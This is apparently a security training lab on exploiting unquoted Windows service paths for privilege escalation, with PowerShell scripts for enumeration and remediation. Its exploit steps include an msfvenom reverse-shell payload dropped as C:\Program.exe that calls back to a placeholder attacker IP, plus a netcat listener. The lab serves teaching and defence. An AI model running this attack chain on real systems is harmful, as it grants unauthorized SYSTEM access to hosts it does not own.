Objective: Exploit unquoted service paths in Windows to execute malicious payloads with elevated privileges, and learn how to mitigate such vulnerabilities by securing service configurations.
Scenario: Unquoted service paths in Windows occur when the path to a service executable contains spaces and is not enclosed in quotes. When the Service Control Manager starts such a service, Windows tries each space as a possible end of the executable name, so an attacker who can write to one of the directories along the path can drop an executable that runs instead of the intended one, with the service's privileges. Your task is to identify and exploit such a misconfiguration and then secure the service paths.
Lab Setup
- Environment:
- A Windows system with services that may have unquoted paths.
- Tools Required:
- Command Prompt or PowerShell.
- Access to administrative privileges.
Lab Steps
Step 1: Enumerate Services and Identify Unquoted Paths
- Use the sc qc command to query a service's configuration:
sc qc <service_name>
- Example output (abbreviated):
SERVICE_NAME: VulnerableService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Vulnerable Service\service.exe
- Note the BINARY_PATH_NAME. If it contains spaces and is not enclosed in quotes, the service is a candidate; it is actually exploitable only if you can also create a file in one of the directories along that path (see Step 2).
- Use wmic to list all auto-start services outside C:\Windows whose path contains no quote character (wmic is deprecated on current Windows builds; the PowerShell query in the Prevention section does the same job):
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
- This lists automatically started services with unquoted paths. The last findstr searches for a literal quote character: inside a cmd argument a quote is written as a doubled quote (""), so """ is the string consisting of one quote.
Step 2: Exploit the Vulnerable Service Path
- Identify potential injection points:
- For a path like C:\Program Files\Vulnerable Service\service.exe, the Service Control Manager passes the unquoted string to CreateProcess, which tries each space as the end of the executable name. The candidates are tried in this order:
C:\Program.exe
C:\Program Files\Vulnerable.exe
C:\Program Files\Vulnerable Service\service.exe
- Check which of the parent directories (here C:\ and C:\Program Files) your current user can create files in, for example with icacls "C:\Program Files". On a default installation neither is writable by standard users; the realistic target is a third-party application directory that was installed with weak ACLs.
- Create a malicious executable at the highest-priority location you can write to (e.g., C:\Program.exe):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe-service -o "C:\Program.exe"
- Replace <your_ip> and <your_port> with your listener's IP address and port. The exe-service format wraps the payload in a minimal service executable that answers the Service Control Manager; a plain -f exe payload never reports itself as started, so the SCM kills it after the start timeout (30 seconds by default) and your shell dies with it.
- Set up a listener on your machine before triggering the service:
nc -lvnp <your_port>
- Restart the vulnerable service to trigger the exploit:
net stop <service_name>
net start <service_name>
- Stopping and starting a service requires the Stop/Start rights in the service's own ACL, which most low-privileged users lack. If the service is AUTO_START, a reboot (or simply waiting for the next one) triggers the hijack instead.
- Verify the reverse shell connection. Note that the legitimate service does not start while your file is in place, which is visible to administrators; remove the file when the exercise is over.
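The enumeration in Step 1 and the injection-point reasoning in Step 2, as an added PowerShell example that is not part of the original lab: it lists auto-start services whose path is unquoted and contains a space, derives the executables Windows would try before the real one, and probes whether the current user can create each of them. Run it as the low-privileged user whose rights you want to assess. Service names and paths come from the host; nothing is hard-coded, and the probe file it briefly creates is an assumption of this example, not a tool of the lab.

```powershell
# Added example, not part of the original lab: enumerate services whose ImagePath is
# unquoted and contains a space, derive the executables Windows would try before the
# real one (Step 2's injection points), and test whether the current user can create
# each of them. Service and path names come from the host; none are hard-coded.

function Get-UnquotedServicePath {
    # Auto-start services outside C:\Windows whose path is not already quoted.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.StartMode -eq 'Auto' -and
            $_.PathName -notmatch '^\s*"' -and
            $_.PathName -notmatch '^\s*[A-Za-z]:\\Windows\\' -and
            $_.PathName -match ' '
        }
}

function Get-HijackCandidate {
    param([Parameter(Mandatory)][string]$PathName)
    # Keep only the executable part (up to the first ".exe"), dropping any arguments.
    $exe = $PathName
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { $exe = $m.Groups[1].Value }
    # Each space is a place where CreateProcess may cut the executable name:
    # "C:\Program Files\Vulnerable Service\service.exe" yields
    #   C:\Program.exe and C:\Program Files\Vulnerable.exe (tried in that order).
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-CanCreateFile {
    param([Parameter(Mandatory)][string]$Path)
    # Creating C:\Program.exe needs "create files" on C:\; creating
    # "C:\Program Files\Vulnerable.exe" needs it on C:\Program Files.
    # A throw-away probe file tests the effective ACL for the current user
    # (hypothetical check for this example; icacls shows the same information).
    $dir = Split-Path -Parent $Path
    if (-not (Test-Path -LiteralPath $dir)) { return $false }
    $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@(0))
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

foreach ($svc in Get-UnquotedServicePath) {
    '{0} [{1}, runs as {2}]: {3}' -f $svc.Name, $svc.StartMode, $svc.StartName, $svc.PathName
    foreach ($candidate in Get-HijackCandidate -PathName $svc.PathName) {
        '    {0}  can-create={1}' -f $candidate, (Test-CanCreateFile -Path $candidate)
    }
}
```

A candidate reported as can-create=True under a standard user, for a service whose StartName is LocalSystem, is the condition the rest of Step 2 relies on; the StartName column also tells you in advance which account Step 3's whoami will show.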
Step 3: Verify Privilege Escalation
- In the reverse shell, confirm that the payload executed with elevated privileges:
whoami
- Expected output for a service running as LocalSystem:
NT AUTHORITY\SYSTEM
- A service configured to run as NT AUTHORITY\LocalService, NT AUTHORITY\NetworkService or a custom account returns that account instead: the privilege gained is exactly the service's account, no more.
- Document the steps used to exploit the unquoted service path.
Solution
Explanation:
- Windows services with unquoted paths allow attackers to place malicious executables in directories searched before the intended executable.
Prevention:
- Quote Service Paths:
- Edit the service configuration so the path is enclosed in quotes. cmd strips the outer quotes of the binPath= argument, so the quotes that must reach the service configuration are escaped as \" (the space after binPath= is required by sc):
sc config <service_name> binPath= "\"C:\Program Files\Vulnerable Service\service.exe\""
- Confirm with sc qc <service_name> that BINARY_PATH_NAME now starts and ends with a quote, then restart the service to make sure it still starts.
- Audit Services:
- Regularly review service configurations for unquoted paths using PowerShell. Matching on a space alone also flags correctly quoted paths and paths with arguments, so exclude entries that already start with a quote:
Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } | Select-Object Name, StartMode, PathName
- Restrict Permissions:
- Ensure directories along the service path are not writable by non-administrative users: check with icacls and remove Modify, Write and "Create files" grants to Users, Authenticated Users and Everyone.
- Monitor and Log Service Activity:
- Use Windows Event Viewer to track service changes and restarts: the System log records service state changes as Service Control Manager event 7036 and new service installations as event 7045; with "Audit Security System Extension" enabled, the Security log records service installation as event 4697.
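The "Quote Service Paths" and "Audit Services" measures above, combined into one added PowerShell example that is not part of the original lab: it finds every service whose path is unquoted and contains a space, quotes the executable part while keeping any trailing arguments, writes the ImagePath registry value (the same value sc config binPath= sets), and verifies the result through the Service Control Manager. Run it elevated; the -WhatIf call at the end only reports what would change, which is the assumed first run on a production host.

```powershell
# Added example, not part of the original lab: find every service whose ImagePath is
# unquoted and contains a space, and rewrite it with the executable part quoted, keeping
# any arguments. Writes the ImagePath registry value directly, which is what
# sc config binPath= sets. Run elevated, and with -WhatIf first to review the changes.

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    $unquoted = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -match ' ' }

    foreach ($svc in $unquoted) {
        # Split "C:\Program Files\X\svc.exe -arg" into the .exe and its trailing arguments.
        $m = [regex]::Match($svc.PathName, '^\s*(.*?\.exe)(.*)$', 'IgnoreCase')
        if (-not $m.Success) {
            Write-Warning "Skipping $($svc.Name): cannot locate an .exe in '$($svc.PathName)'"
            continue
        }
        $fixed = '"' + $m.Groups[1].Value + '"' + $m.Groups[2].Value
        $key   = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"

        if ($PSCmdlet.ShouldProcess($svc.Name, "set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
            # Verify through the SCM, not just the registry.
            $after = (Get-CimInstance -ClassName Win32_Service -Filter "Name='$($svc.Name)'").PathName
            if ($after -ne $fixed) {
                Write-Warning "Verification failed for $($svc.Name): '$after'"
            } else {
                'Fixed {0}: {1}' -f $svc.Name, $after
            }
        }
    }
}

# Dry run: lists the services and the quoted path each would receive.
Repair-UnquotedServicePath -WhatIf
```

After running it for real, restart each changed service (or reboot) and confirm it starts; a service whose path could not be split at ".exe" is left untouched and reported, so it can be fixed by hand with the sc config form shown above.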
Testing and Verification
- Re-query the service configuration to confirm the path is enclosed in quotes.
- Attempt to exploit the service again to ensure the vulnerability has been mitigated.
- Verify that only authorized users can modify files in the service path.
Reflection
This exercise demonstrates how unquoted service paths in Windows can be exploited for privilege escalation. By identifying and mitigating these vulnerabilities, you’ve gained valuable insights into securing Windows services and preventing unauthorized access.